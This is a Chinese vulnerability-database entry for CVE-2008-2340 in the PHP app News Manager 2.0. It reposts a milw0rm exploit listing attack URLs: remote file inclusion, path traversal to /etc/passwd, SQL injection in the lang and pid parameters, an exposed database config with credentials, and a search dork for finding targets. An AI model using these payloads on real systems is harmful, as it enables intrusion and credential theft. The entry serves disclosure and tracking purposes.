News Manager 多个远程漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115220 漏洞类型 SQL注入
发布时间 2008-05-15 更新时间 2008-09-05
CVE编号 CVE-2008-2340 CNNVD-ID CNNVD-200805-251
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5624
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-251
|漏洞详情
NewsManager2.0版本存在多个SQL注入漏洞。远程攻击者可以借助到(a)advsearch.php,(b)archive.php,和(c)index.php的(1)lang参数,和到(d)list_tagitems.php的(2)pid参数,执行任意的SQL指令。
|漏洞EXP
News Manager 2.0 Multiple Vulnerabilities
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
1- Remote File Include Vulnerability
/ch_readalso.php?read_xml_include=http://localhost/020.txt
2- Remote File Disclosure Vulnerability
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
/login/attachments.php?id=
3- Remote SQL Injection Vulnerabilities
/list_tagitems.php?pid=-41[SQL]
/advsearch.php?lang='[SQL]
/archive.php?lang='[SQL]
/index.php?lang='[SQL]
4- Remote Permission Bypass Vulnerability
/db/connect_str.php
You Can Get Username Of db & Pass & Name .. As 
mysql||localhost||newsmanager||root||mahmood4li
5- You Can Get PHPINFO From 
/login/info.php
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs   :) 

# milw0rm.com [2008-05-15]
|参考资料

来源:XF
名称:newsmanager-multiple-sql-injection(42461)
链接:http://xforce.iss.net/xforce/xfdb/42461
来源:BID
名称:29251
链接:http://www.securityfocus.com/bid/29251
来源:MILW0RM
名称:5624
链接:http://www.milw0rm.com/exploits/5624